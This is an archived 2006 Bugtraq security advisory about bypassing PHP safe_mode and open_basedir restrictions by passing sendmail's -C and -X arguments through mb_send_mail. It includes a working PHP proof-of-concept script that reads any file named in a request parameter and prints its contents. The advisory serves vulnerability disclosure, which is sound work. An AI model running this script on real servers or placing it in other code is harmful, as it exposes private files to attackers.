Network Security: Detailed info on (PHP) mb_send

Ethical Hacking

Learn to find vulnerabilities before the bad guys do! Gain real world hands on hacking experience in our state of the art hacking lab. Course designed and taught by expert instructors with years of penetration testing experience. 12 student maximum in every class. Certification attempt included in every package.

Computer Forensics Training at InfoSec Institute

Gain the in-demand skills of a certified computer examiner, learn to recover trace data left behind by fraud, theft, and cybercrime perpetrators. Discover the source of computer crime and abuse at your organization so that it never happens again. All of our class sizes are guaranteed to be 12 students or less to facilitate one-on-one interaction with one of our expert instructors.

Network Security Bugtraq

[Top] [All Lists]

(PHP) mb_send_mail security bypass

from [ced . clerget] Network Security

[Permanent Link]

Subject:	(PHP) mb_send_mail security bypass
Date:	28 Feb 2006 18:52:49 -0000

Vulnerable: PHP4, PHP5
with use of sendmail 8.13.4 ><

When safemode disabled and open_basedir restriction in effect, we can pass 
extra parameters
to sendmail command in mail function, especially the -C and -X arguments.
-C for alternate configuration file
-X to log all in a file
Can be used to view files, pass the file to view to C argument and store 
content in file
passed to X argument.

When safemode enabled and open_basedir restriction in effect, we can pass extra 
parameters
to sendmail command in mb_send_mail function.

Solution:
Use other sendmail command and don't allow extra parameters for mb_send_mail 
when safemode enabled

<?php
        if (isset($_REQUEST['file'])) {
                $file = "sendlog";
                if (file_exists($file)) unlink($file);
                $extra = "-C ".$_REQUEST['file']." -X ".getcwd()."/".$file;
                mb_send_mail(NULL, NULL, NULL, NULL, $extra);
                echo "<pre>".file_get_contents($file)."</pre>";
        }
?>

[More with this subject...]

<Prev in Thread]	Current Thread	[Next in Thread>
(PHP) mb_send_mail security bypass, ced . clerget <=

Previous by Date:	[Full-disclosure] Mozilla Thunderbird : Multiple Information Disclosure Vulnerabilities, Renaud Lifchitz
Next by Date:	[security bulletin] SSRT061118 rev.1 - HP System Management Homepage (SMH) Running on Windows: Remote Unauthorized Access, security-alert
Previous by Thread:	[Full-disclosure] Mozilla Thunderbird : Multiple Information Disclosure Vulnerabilities, Renaud Lifchitz
Next by Thread:	[security bulletin] SSRT061118 rev.1 - HP System Management Homepage (SMH) Running on Windows: Remote Unauthorized Access, security-alert
Indexes:	[Date] [Thread] [Top] [All Lists]